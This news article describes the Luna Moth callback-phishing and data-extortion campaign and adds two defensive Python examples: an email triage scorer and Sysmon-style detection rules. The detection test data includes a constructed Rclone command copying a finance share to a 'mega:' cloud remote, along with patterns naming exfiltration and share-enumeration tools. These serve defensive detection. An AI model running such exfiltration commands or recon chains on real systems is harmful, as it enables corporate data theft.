A newly emerged data extortion group going by the moniker Luna Moth is targeting numerous organizations through fake subscription renewal…
Companies are being breached by a new data extortion group that demands a ransom in exchange for not releasing the stolen data to the public. Since March, the group, known as Luna Moth, has been running phishing campaigns that deliver remote access tools (RATs) used to steal corporate data.
Sygnia's Incident Response team has been tracking Luna Moth's activity and observes that the actor is trying to build a reputation under the name Silent Ransom Group (SRG).
In a report published earlier this month, Sygnia says that the way Luna Moth (also tracked as TG2729) operates resembles a classic scam, except that the aim is to gain access to sensitive information.
To that end, Luna Moth relies on phishing. Over the past three months the group has run a large-scale campaign of bogus subscription emails impersonating Zoho, MasterClass, and Duolingo.
Victims receive what appears to be a notice from one of those services stating that their subscription is about to expire and will be renewed automatically, with payment taken within 24 hours.
The sender names imitate the impersonated brand, but the messages are sent from Gmail accounts, which gives the fraud away to anyone who looks at the actual sender address.
Attached to the email is a fake invoice listing a phone number to call for anyone who wants to ask about the subscription or cancel it.
Calling that number puts the victim on the line with the scammer, who talks them through installing a remote access tool on their system. Because the victim installs a legitimate, commercially available tool at the scammer's direction, the initial access involves no malware for email filters or antivirus to flag.
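The lure described above has three observable traits a mail filter can score without any URL or attachment detonation: a brand name in the sender's display name paired with a consumer webmail domain, subscription-renewal pressure wording, and a phone number (usually on an attached "invoice") in place of a link. The following triage function is an added example written for this article, not Sygnia's code or any vendor product. The sample messages are constructed, gmail.com is the only sender domain the report mentions (the other webmail domains, the phone-number format and the phrase list are assumptions), and the phone number and mailbox names are fictional.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr

# Brands Sygnia saw impersonated in this campaign.
IMPERSONATED_BRANDS = ("zoho", "masterclass", "duolingo")

# Consumer webmail domains a real billing notice from these brands would not use.
# gmail.com is what the report observed; the other three are an assumption.
WEBMAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}

# Renewal-pressure wording (substrings, matched on the lowercased body).
RENEWAL_PHRASES = ("subscription", "renew", "expir", "24 hours", "invoice")

# North American phone formats; extend for other regions (assumption).
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")


def triage(raw: str) -> dict:
    """Score one RFC 5322 message for the callback-phishing pattern."""
    msg = message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(str(msg.get("From", "")))
    local, _, domain = addr.lower().rpartition("@")
    reasons = []

    # 1. Brand name in the display name or mailbox, but a webmail sender domain.
    brand = next((b for b in IMPERSONATED_BRANDS
                  if b in display.lower() or b in local), None)
    brand_mismatch = brand is not None and domain in WEBMAIL_DOMAINS
    if brand_mismatch:
        reasons.append(f"'{brand}' in sender name but sent from {domain}")

    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content().lower() if body else ""

    # 2. Two or more renewal / expiry / payment phrases.
    hits = [p for p in RENEWAL_PHRASES if p in text]
    renewal_wording = len(hits) >= 2
    if renewal_wording:
        reasons.append("renewal wording: " + ", ".join(hits))

    # 3. A phone number in the body: the lure is a call, not a link.
    phone = PHONE_RE.search(text)
    if phone:
        reasons.append(f"callback number {phone.group().strip()}")

    # 4. An "invoice" attachment, which is where the number is usually printed.
    names = [(p.get_filename() or "").lower() for p in msg.iter_attachments()]
    invoice = [n for n in names if "invoice" in n]
    if invoice:
        reasons.append("invoice-style attachment: " + ", ".join(invoice))

    if brand_mismatch and phone and (renewal_wording or invoice):
        verdict = "callback-phish"
    elif reasons:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "reasons": reasons}


def build_sample(from_hdr: str, subject: str, body: str, attachment: str = "") -> str:
    """Constructed test message (not a real capture); returns raw RFC 5322 text."""
    m = EmailMessage()
    m["From"] = from_hdr
    m["To"] = "accounts-payable@example.com"
    m["Subject"] = subject
    m.set_content(body)
    if attachment:
        m.add_attachment(b"%PDF-1.4 placeholder", maintype="application",
                         subtype="pdf", filename=attachment)
    return m.as_string()


# Constructed samples: a Luna Moth-style lure, a Gmail sender that only
# borrows a brand name, and an ordinary internal email.
LURE = build_sample(
    "Zoho Billing <zoho.billing.desk@gmail.com>",
    "Your Zoho subscription renews in 24 hours",
    "Your Zoho Workplace subscription expires today and will be\n"
    "renewed automatically within 24 hours. The invoice is attached.\n"
    "To cancel or ask questions, call +1 (888) 555-0142.\n",
    "Zoho_Invoice.pdf")
REVIEW = build_sample(
    "Duolingo Support <duolingo.support@gmail.com>",
    "Question about your account",
    "Hi, could you confirm the email on your account?\n")
BENIGN = build_sample(
    "Alice Chen <alice@example.com>", "Q2 report",
    "Hi, the quarterly report is attached.\nThanks, Alice\n", "Q2-report.pdf")

if __name__ == "__main__":
    for name, raw in (("LURE", LURE), ("REVIEW", REVIEW), ("BENIGN", BENIGN)):
        print(name, triage(raw))
```

The verdict is deliberately conservative: a brand name on a Gmail sender alone only earns "review", since that also describes a careless but genuine reseller, while the combination of a mismatched sender, a callback number and renewal pressure (or an invoice attachment) is the full pattern the report describes.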
Luna Moth's mode of operation does not suggest a sophisticated threat actor, and its choice of tools confirms that.
According to Sygnia, the gang uses commercially available remote management and remote desktop tools such as Atera, AnyDesk, Syncro, and Splashtop.
In many of the intrusions investigated, the researchers found several such tools installed on the same victim workstation, giving the attackers redundancy and persistence if one agent is noticed and removed.
Other tools the attackers installed by hand include SoftPerfect Network Scanner, SharpShares, and Rclone, which together give them what they need to map the network, find shares holding valuable files, pivot, and copy the data out.
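None of the tools named above is malware, so signature-based controls stay quiet; what stands out is the sequence on a single workstation: a second RMM agent landing shortly after the first, share and host enumeration, then Rclone pushing data to a cloud remote. The rules below run that logic over Sysmon-style process-creation events. This is an added example written for this article, not Sygnia's detection content or any product's rules. The events, hostnames, usernames and install paths are constructed; the netscan and SharpShares binary names, the 24-hour window for "redundant" agents, and the cloud-remote heuristic (a name of two or more characters before a colon, so Windows drive letters are ignored) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Commercial RMM / remote-desktop products Sygnia saw Luna Moth install, matched
# on a keyword anywhere in the image path so vendor install directories count too.
RMM_KEYWORDS = {"atera": "Atera", "anydesk": "AnyDesk",
                "syncro": "Syncro", "splashtop": "Splashtop"}

# Recon / share-enumeration tools from the report (usual binary names; assumption).
RECON_BINARIES = {"netscan.exe": "SoftPerfect Network Scanner",
                  "netscan64.exe": "SoftPerfect Network Scanner",
                  "sharpshares.exe": "SharpShares"}

# rclone copy/sync/move to a named remote ("mega:", "gdrive:"), i.e. a cloud
# target. A single letter before ":" is a Windows drive, so require two or more.
RCLONE_REMOTE_RE = re.compile(r"\b(copy|sync|move)\b.*?\s([A-Za-z][\w-]+):", re.I)

RMM_WINDOW = timedelta(hours=24)  # assumption: how close two agents must land


def detect(events):
    """Run the rules over Sysmon-style process-creation events and return
    {host: [finding, ...]}. Each event: host, ts (ISO 8601), user, image, cmdline."""
    findings = defaultdict(list)
    rmm_first_seen = defaultdict(dict)  # host -> product -> first timestamp

    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        host, image = ev["host"], ev["image"].lower()
        base = PureWindowsPath(image).name
        cmdline = ev["cmdline"]

        # Rule 1: a second, different RMM agent on a host that already has one.
        for kw, product in RMM_KEYWORDS.items():
            seen = rmm_first_seen[host]
            if kw in image and product not in seen:
                earlier = [p for p, t in seen.items() if ts - t <= RMM_WINDOW]
                seen[product] = ts
                if earlier:
                    findings[host].append({
                        "ts": ev["ts"], "rule": "multiple_rmm_agents",
                        "detail": f"{product} after {', '.join(earlier)} by {ev['user']}"})

        # Rule 2: share / host enumeration binaries.
        if base in RECON_BINARIES:
            findings[host].append({"ts": ev["ts"], "rule": "share_enumeration",
                                   "detail": f"{RECON_BINARIES[base]} ({base})"})

        # Rule 3: rclone pushing data to a cloud remote (local-to-local copies ignored).
        if base == "rclone.exe" or "rclone" in cmdline.lower():
            m = RCLONE_REMOTE_RE.search(cmdline)
            if m:
                findings[host].append({"ts": ev["ts"], "rule": "rclone_cloud_exfil",
                                       "detail": f"{m.group(1)} to remote '{m.group(2)}'"})
    return dict(findings)


# Constructed events: one workstation showing the full chain, and one IT-managed
# host with a single RMM agent and a local rclone copy that should stay quiet.
EVENTS = [
    {"host": "WS-FIN-07", "ts": "2022-06-14T10:02:11", "user": "CORP\\jdoe",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe --install"},
    {"host": "WS-FIN-07", "ts": "2022-06-14T10:06:40", "user": "CORP\\jdoe",
     "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe", "cmdline": "AteraAgent.exe"},
    {"host": "WS-FIN-07", "ts": "2022-06-14T10:31:05", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\netscan.exe", "cmdline": "netscan.exe"},
    {"host": "WS-FIN-07", "ts": "2022-06-14T10:44:52", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\SharpShares.exe", "cmdline": "SharpShares.exe"},
    {"host": "WS-FIN-07", "ts": "2022-06-14T11:12:30", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\rclone.exe",
     "cmdline": r'rclone.exe copy "\\fs01\finance" mega:finance --transfers 8'},
    {"host": "WS-ENG-03", "ts": "2022-06-14T09:15:00", "user": "CORP\\helpdesk",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"host": "WS-ENG-03", "ts": "2022-06-14T09:20:00", "user": "CORP\\bsmith",
     "image": r"C:\Tools\rclone.exe", "cmdline": r"rclone.exe copy C:\data D:\backup"},
]

if __name__ == "__main__":
    for host, hits in detect(EVENTS).items():
        for f in hits:
            print(host, f["ts"], f["rule"], f["detail"])
```

A single RMM agent is deliberately not alerted on, since helpdesks install these products legitimately; the signal is the second agent under the same user within the window, and any one of the three rules on a host is enough to open a ticket, with all three in order being the report's full chain.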
The same playbook was used in earlier attacks in which scammers tricked victims with bogus emails about renewing antivirus subscriptions.
According to Sygnia, the threat actors do not go after particular victims. The attacks are opportunistic: they take whatever data they can reach and then extort the victim.
The demands are substantial nonetheless, with analysts estimating that Luna Moth may ask for "millions of dollars in ransom."
Despite the lack of sophistication, Sygnia found that Luna Moth used roughly 90 domain names, either as attack infrastructure or to host data stolen from victim companies.
Researchers identified more than 40 phishing sites whose names resemble the impersonated brands, in this campaign Zoho, MasterClass, and Duolingo. The remaining servers were used for data exfiltration.
While extortion is usually associated with ransomware operations, stealing sensitive data without encrypting systems is becoming a new way to monetize corporate breaches.
Karakurt is another data extortion outfit, one that analysts have linked to the Conti ransomware operation, which recently shut down.